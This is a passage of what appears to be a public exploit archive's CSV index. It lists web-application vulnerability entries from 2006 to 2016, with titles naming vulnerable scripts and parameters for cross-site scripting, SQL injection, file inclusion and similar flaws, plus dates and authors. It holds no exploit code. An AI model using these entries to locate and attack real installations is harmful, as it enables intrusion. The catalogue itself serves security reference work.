+28465,exploits/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - 'Loginreq2.php' Cross-Site Scripting",2006-08-30,DarkFig,webapps,php, +28466,exploits/php/webapps/28466.txt,"Learn.com - 'Learncenter.asp' Cross-Site Scripting",2006-08-30,Crack_MaN,webapps,php, +28467,exploits/php/webapps/28467.txt,"ExBB 1.9.1 - 'Home_Path' Multiple Remote File Inclusions",2006-08-31,Matdhule,webapps,php, +28468,exploits/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusions",2006-09-01,MATASANOS,webapps,php, +28452,exploits/php/webapps/28452.txt,"WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",webapps,php, +28453,exploits/php/webapps/28453.txt,"EZContents 2.0.3 - 'event_list.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28454,exploits/php/webapps/28454.txt,"EZContents 2.0.3 - 'calendar.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28455,exploits/php/webapps/28455.txt,"EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28456,exploits/php/webapps/28456.txt,"EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28457,exploits/php/webapps/28457.txt,"EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28458,exploits/php/webapps/28458.txt,"EZContents 2.0.3 - 'shownews.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28459,exploits/php/webapps/28459.txt,"EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28460,exploits/php/webapps/28460.txt,"EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28461,exploits/php/webapps/28461.txt,"EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28462,exploits/php/webapps/28462.txt,"EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,webapps,php, +28470,exploits/php/webapps/28470.txt,"VBZoom 1.11 - 'profile.php' Cross-Site Scripting",2006-09-01,Crack_MaN,webapps,php, +28471,exploits/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,webapps,php, +28472,exploits/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,webapps,php, +28473,exploits/php/webapps/28473.txt,"Autentificator 2.01 - 'Aut_Verifica.Inc.php' SQL Injection",2006-09-02,SirDarckCat,webapps,php, +28485,exploits/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",webapps,php, +28486,exploits/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion",2006-09-04,"Saudi Hackrz",webapps,php, +28487,exploits/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",webapps,php, +28488,exploits/php/webapps/28488.php,"PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion",2006-09-04,Kacper,webapps,php, +28490,exploits/php/webapps/28490.txt,"SoftBB 0.1 - 'Page' Cross-Site Scripting",2006-09-05,ThE__LeO,webapps,php, +28492,exploits/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - 'Joueurs.php' SQL Injection",2006-09-06,DrEiNsTeIn,webapps,php, +28493,exploits/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,webapps,php, +28494,exploits/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,webapps,php, +28495,exploits/php/webapps/28495.txt,"TWiki 4.0.x - 'Viewfile' Directory Traversal",2006-09-07,"Peter Thoeny",webapps,php, +28496,exploits/php/webapps/28496.php,"PHP-Fusion 6.0.x - 'news.php' SQL Injection",2006-09-07,rgod,webapps,php, +28497,exploits/php/webapps/28497.txt,"Vikingboard 0.1b - 'help.php' Cross-Site Scripting",2006-09-08,Hessam-x,webapps,php, +28498,exploits/php/webapps/28498.txt,"Vikingboard 0.1b - 'report.php' Cross-Site Scripting",2006-09-08,Hessam-x,webapps,php, +28499,exploits/php/webapps/28499.txt,"Vikingboard 0.1 - 'topic.php' SQL Injection",2006-09-08,Hessam-x,webapps,php, +28502,exploits/php/webapps/28502.txt,"TextAds - 'delete.php?id' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,webapps,php, +28503,exploits/php/webapps/28503.txt,"TextAds - 'error.php?error' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,webapps,php, +28505,exploits/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,webapps,php, +29215,exploits/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - 'QB_Path' Multiple Remote File Inclusions",2006-12-27,Shell,webapps,php, +28510,exploits/php/webapps/28510.txt,"PHProg 1.0 - 'index.php?album' Cross-Site Scripting",2006-09-11,cdg393,webapps,php, +28511,exploits/php/webapps/28511.txt,"PHProg 1.0 - 'index.php?lang' Traversal Arbitrary File Access",2006-09-11,cdg393,webapps,php, +28514,exploits/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 - 'Terminal' Directory Traversal",2006-09-12,"Chris Murtagh",webapps,cgi, +28515,exploits/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - 'rightbar.php?suser' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,webapps,php, +28516,exploits/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - 'open_tickets.php?ticket_id' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,webapps,php, +28517,exploits/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php?cons_page_title' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,webapps,php, +40377,exploits/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-09-13,"Benjamin Daniel Mussler",webapps,linux, +28518,exploits/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,webapps,php, +28519,exploits/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",webapps,php, +28520,exploits/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php, +28522,exploits/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28523,exploits/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28524,exploits/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28525,exploits/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28526,exploits/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28527,exploits/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28528,exploits/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28529,exploits/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28530,exploits/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28531,exploits/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28532,exploits/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28533,exploits/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28534,exploits/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28535,exploits/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28536,exploits/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28537,exploits/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28538,exploits/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28539,exploits/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28540,exploits/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28541,exploits/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,webapps,php, +28543,exploits/php/webapps/28543.txt,"ForumJBC 4.0 - 'Haut.php' Cross-Site Scripting",2006-09-13,ThE__LeO,webapps,php, +28544,exploits/php/webapps/28544.txt,"K2News Management 1.3 - 'Ratings.php' Cross-Site Scripting",2006-09-13,meto5757,webapps,php, +28545,exploits/php/webapps/28545.txt,"e107 website system 0.7.5 - 'contact.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28546,exploits/php/webapps/28546.txt,"e107 website system 0.7.5 - 'download.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28547,exploits/php/webapps/28547.txt,"e107 website system 0.7.5 - 'admin.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28548,exploits/php/webapps/28548.txt,"e107 website system 0.7.5 - 'fpw.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28549,exploits/php/webapps/28549.txt,"e107 website system 0.7.5 - 'news.php?PATH_INFO' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28551,exploits/php/webapps/28551.txt,"e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28552,exploits/php/webapps/28552.txt,"e107 website system 0.7.5 - 'signup.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28554,exploits/php/webapps/28554.txt,"e107 website system 0.7.5 - 'submitnews.php?PATH_INFO' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28555,exploits/hardware/webapps/28555.txt,"Good for Enterprise 2.2.2.1611 - Cross-Site Scripting",2013-09-25,Mario,webapps,hardware, +28556,exploits/php/webapps/28556.txt,"e107 website system 0.7.5 - 'user.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,webapps,php, +28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80 +28558,exploits/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",webapps,linux, +28658,exploits/php/webapps/28658.txt,"MyPhotos 0.1.3b - 'index.php' Remote File Inclusion",2006-09-23,Root3r_H3ll,webapps,php, +28659,exploits/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - 'login.php' Cross-Site Scripting",2006-09-24,meto5757,webapps,palm_os, +28660,exploits/php/webapps/28660.php,"cPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",webapps,php, +28560,exploits/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,webapps,php, +28562,exploits/hardware/webapps/28562.txt,"Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",webapps,hardware, +28563,exploits/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",webapps,multiple, +28564,exploits/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,webapps,php, +38990,exploits/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection",2015-12-15,"Linux Zone Research Team",webapps,php,80 +28565,exploits/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",webapps,php, +28566,exploits/asp/webapps/28566.txt,"Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting",2006-09-13,ajann,webapps,asp, +28567,exploits/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injections",2006-09-13,"Aliaksandr Hartsuyeu",webapps,php, +28568,exploits/php/webapps/28568.txt,"NX5Linkx 1.0 - 'links.php' HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",webapps,php, +28569,exploits/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,webapps,php, +28570,exploits/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",webapps,cgi, +28571,exploits/php/webapps/28571.txt,"DCP-Portal 6.0 - '/admin/inc/footer.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",webapps,php, +28572,exploits/php/webapps/28572.txt,"DCP-Portal 6.0 - '/admin/inc/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",webapps,php, +28573,exploits/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php?Username' SQL Injection",2006-09-14,"HACKERS PAL",webapps,php, +28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php, +28575,exploits/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusions",2006-09-14,"Saudi Hackrz",webapps,php, +28577,exploits/asp/webapps/28577.txt,"ClickBlog! 2.0 - 'default.asp' SQL Injection",2006-09-14,ajann,webapps,asp, +28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php, +28581,exploits/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - 'galleryuploadfunction.php' Arbitrary File Upload",2006-09-15,"HACKERS PAL",webapps,php, +28582,exploits/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php, +28583,exploits/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php, +28584,exploits/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php, +28585,exploits/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php, +28586,exploits/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register Multiple SQL Injections",2006-09-15,"HACKERS PAL",webapps,php, +28587,exploits/asp/webapps/28587.txt,"EasyPage 7 - 'Default.aspx' SQL Injection",2006-09-15,s3rv3r_hack3r,webapps,asp, +28589,exploits/asp/webapps/28589.txt,"Web Wiz Forums 7.01 - 'members.asp' Cross-Site Scripting",2006-09-15,Crack_MaN,webapps,asp, +28590,exploits/php/webapps/28590.txt,"Hitweb 3.0 - 'REP_CLASS' Multiple Remote File Inclusions",2006-09-16,ERNE,webapps,php, +28591,exploits/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 - 'profile.php' Multiple SQL Injections",2006-09-16,"HACKERS PAL",webapps,php, +28592,exploits/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 - 'pm.php?replyuser' Cross-Site Scripting",2006-09-16,"HACKERS PAL",webapps,php, +28593,exploits/asp/webapps/28593.txt,"ZilekPortal 1.0 - 'Haberdetay.asp' SQL Injection",2006-09-16,chernobiLe,webapps,asp, +28594,exploits/php/webapps/28594.txt,"Artmedic Links 5.0 - 'index.php' Remote File Inclusion",2006-09-16,botan,webapps,php, +28597,exploits/asp/webapps/28597.txt,"ECardPro 2.0 - 'search.asp' SQL Injection",2006-09-18,ajann,webapps,asp, +28598,exploits/php/webapps/28598.txt,"IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,s3rv3r_hack3r,webapps,php, +28599,exploits/php/webapps/28599.txt,"NixieAffiliate 1.9 - 'lostpassword.php' Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,webapps,php, +28600,exploits/asp/webapps/28600.txt,"EShoppingPro 1.0 - 'Search_Run.asp' SQL Injection",2006-09-18,ajann,webapps,asp, +28601,exploits/php/webapps/28601.txt,"PT News 1.7.8 - 'search.php' Cross-Site Scripting",2006-09-18,Snake,webapps,php, +28603,exploits/php/webapps/28603.txt,"Innovate Portal 2.0 - 'index.php' Cross-Site Scripting",2006-09-19,meto5757,webapps,php, +28604,exploits/php/webapps/28604.txt,"ESyndiCat 1.5 - 'search.php' Cross-Site Scripting",2006-09-19,meto5757,webapps,php, +28605,exploits/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'downloadfile' Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",webapps,jsp, +28606,exploits/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updatemail' Servlet Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",webapps,jsp, +28607,exploits/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'addrlist' Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",webapps,jsp, +28608,exploits/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'maillist' Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",webapps,jsp, +28609,exploits/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_id' Servlet Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",webapps,jsp, +28610,exploits/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_name' Servlet Cross-Site Scripting",2006-09-20,"Tan Chew Keong",webapps,jsp, +28611,exploits/php/webapps/28611.txt,"RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion",2006-09-19,Root3r_H3ll,webapps,php, +28612,exploits/php/webapps/28612.txt,"RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,webapps,php, +28613,exploits/php/webapps/28613.txt,"RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,webapps,php, +28614,exploits/php/webapps/28614.txt,"RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,webapps,php, +28615,exploits/asp/webapps/28615.txt,"DotNetNuke 4.0 - HTML Injection",2006-09-17,"Secure Shapes",webapps,asp, +28616,exploits/php/webapps/28616.txt,"A.I-Pifou 1.8 - 'Choix_langue.php' Directory Traversal",2006-09-20,cdg393,webapps,php, +28617,exploits/php/webapps/28617.txt,"BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28618,exploits/php/webapps/28618.txt,"BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28619,exploits/php/webapps/28619.txt,"BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28620,exploits/php/webapps/28620.txt,"BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28621,exploits/php/webapps/28621.txt,"BandSite CMS 1.1 - 'header.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28622,exploits/php/webapps/28622.txt,"BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28623,exploits/php/webapps/28623.txt,"BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28624,exploits/php/webapps/28624.txt,"BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28625,exploits/php/webapps/28625.txt,"BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28626,exploits/php/webapps/28626.txt,"BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28627,exploits/php/webapps/28627.txt,"BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28628,exploits/php/webapps/28628.txt,"BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28629,exploits/php/webapps/28629.txt,"BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28630,exploits/php/webapps/28630.txt,"BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28631,exploits/php/webapps/28631.txt,"BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28632,exploits/php/webapps/28632.txt,"BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28633,exploits/php/webapps/28633.txt,"BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28634,exploits/php/webapps/28634.txt,"BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28635,exploits/php/webapps/28635.txt,"BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28636,exploits/php/webapps/28636.txt,"BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28637,exploits/php/webapps/28637.txt,"BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28638,exploits/php/webapps/28638.txt,"BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",webapps,php, +28644,exploits/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",webapps,php, +28645,exploits/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - 'Vendors.php' Directory Traversal",2006-09-22,"James Bercegay",webapps,php, +28646,exploits/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",webapps,php, +28647,exploits/php/webapps/28647.txt,"PLESK 7.5/7.6 - 'FileManager.php' Directory Traversal",2006-09-22,GuanYu,webapps,php, +28649,exploits/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,webapps,hardware, +28695,exploits/php/webapps/28695.txt,"CubeCart 3.0.x - '/admin/forgot_pass.php?user_name' SQL Injection",2006-09-26,"HACKERS PAL",webapps,php, +40359,exploits/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,webapps,osx, +28696,exploits/php/webapps/28696.txt,"CubeCart 3.0.x - 'view_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",webapps,php, +28697,exploits/php/webapps/28697.txt,"CubeCart 3.0.x - 'view_doc.php?view_doc' SQL Injection",2006-09-26,"HACKERS PAL",webapps,php, +28698,exploits/php/webapps/28698.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",webapps,php, +28699,exploits/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",webapps,php, +28652,exploits/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,webapps,hardware,80 +28653,exploits/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,webapps,linux, +28654,exploits/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php?WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",webapps,php,80 +28656,exploits/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",webapps,php,80 +28661,exploits/php/webapps/28661.txt,"ToendaCMS 1.0.4 - 'Media.php' Directory Traversal",2006-09-24,MoHaJaLi,webapps,php, +28662,exploits/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,webapps,php, +28663,exploits/php/webapps/28663.txt,"Photostore - 'view_photog.php?photogid' Cross-Site Scripting",2006-09-25,meto5757,webapps,php, +28664,exploits/php/webapps/28664.txt,"Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting",2006-09-25,meto5757,webapps,php, +28665,exploits/php/webapps/28665.txt,"WWWThreads 5.4 - 'Cat' Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,webapps,php, +28667,exploits/php/webapps/28667.txt,"BirdBlog 1.x - 'comment.php?entryid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,webapps,php, +28668,exploits/php/webapps/28668.txt,"BirdBlog 1.x - 'index.php?page' Cross-Site Scripting",2006-09-25,Root3r_H3ll,webapps,php, +28669,exploits/php/webapps/28669.txt,"BirdBlog 1.x - 'user.php?uid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,webapps,php, +28670,exploits/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php?page' Cross-Site Scripting",2006-09-25,You_You,webapps,php, +28671,exploits/php/webapps/28671.txt,"DanPHPSupport 0.5 - 'admin.php?do' Cross-Site Scripting",2006-09-25,You_You,webapps,php, +28672,exploits/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28673,exploits/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28674,exploits/php/webapps/28674.pl,"Back-End CMS 0.4.5 - '/admin/index.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28675,exploits/php/webapps/28675.txt,"Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28676,exploits/php/webapps/28676.txt,"Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28684,exploits/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",webapps,php,80 +28685,exploits/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",webapps,php, +28686,exploits/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28687,exploits/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, +28688,exploits/php/webapps/28688.txt,"PHP_news 2.0 - '/admin/news.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,webapps,php, 